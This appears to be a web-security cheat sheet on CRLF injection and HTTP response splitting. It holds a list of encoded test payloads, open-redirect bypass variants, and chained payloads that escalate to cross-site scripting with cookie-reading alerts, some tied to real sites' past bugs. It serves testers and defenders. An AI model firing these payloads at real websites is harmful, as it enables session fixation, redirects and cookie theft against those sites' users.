Skip to content

Header Injection

CRLF Injection || HTTP Response Splitting

Header Injection aka CRLF Injection aka HTTP Response Splitting

Parameter reflected in to the Headers might be able to add headers to the response
Header Injection Example

Example:

https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=%E5%98%8A%E5%98%8DSet-Cookie:%20test


HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8[CR][LF]
Set-Cookie: foo=[CR][LF]
[CR][LF]
<img src="
Set-Cookie: twitter_sess=[...]; HTTPOnly[CR][LF]
[CR][LF]
<p class="twttr">Original response body</p>

This attack can lead to Open Redirects and session fixation

Test Cases

%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header

Open Redirect Examples

CRLF chained with Open Redirect server misconfiguration

Note

This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)

//www.google.com/%2f%2e%2e%0d%0aheader:header


/www.google.com/%2e%2e%2f%0d%0aheader:header


/google.com/%2F..%0d%0aheader:header

Firefox Blacklist Examples (old)

%E5%98%8A%E5%98%8Dheader:header

CRLF Injection to XSS

%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

Response splitting on 302 Redirect, before Location header (Discovered in DoD)

%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E

Response splitting on 301 code, chained with Open Redirect to corrupt location header and to break 301

by @black2fan (Facebook bug)

Note

xxx:1 was used for breaking open redirect destination (Location header). Great example how of to escalate CRLF to XSS on a such, it would seem, unexploitable 301 status code.

%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr